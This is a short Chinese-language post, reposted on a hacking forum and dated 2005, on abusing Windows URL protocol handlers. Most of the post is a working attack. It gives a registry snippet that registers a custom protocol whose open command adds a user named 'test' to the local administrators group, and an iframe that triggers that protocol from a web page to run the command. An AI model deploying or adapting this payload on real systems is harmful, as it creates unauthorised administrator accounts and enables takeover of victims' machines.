邪恶八进制信息安全团队技术讨论组 » 网络攻防技术{ Hacking and Defence } » [转载]URL Protocol [查看完整版本]

exploit 2005-2-10 03:02

[转载]URL Protocol

信息来源：CoolICE WebLog

凡具有\HEKY_CLASSES_ROOT\MyProtocol\"URL Protocol"==reg_sz:""键值的，该MyProtocol均被注册为系统的协议
[HKEY_CLASSES_ROOT\MY\shell\open\command]
@="MyCMD.exe \"%1\""
MyProtol://location调用的时候形如:
MyCMD.exe MyProtocol://location
可以先注册一个协议：
Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT\MY]
@="MY PROTOCOL"
"URL Protocol"=""
[HKEY_CLASSES_ROOT\MY\shell\open\command]
@="cmd.exe /c net user test test /add&net localgroup administrators test /add"
然后调用该协议，可在网页执行任意命令
<iframe src="my://"></iframe>

查看完整版本: [转载]URL Protocol

© 1999-2008 EvilOctal Security Team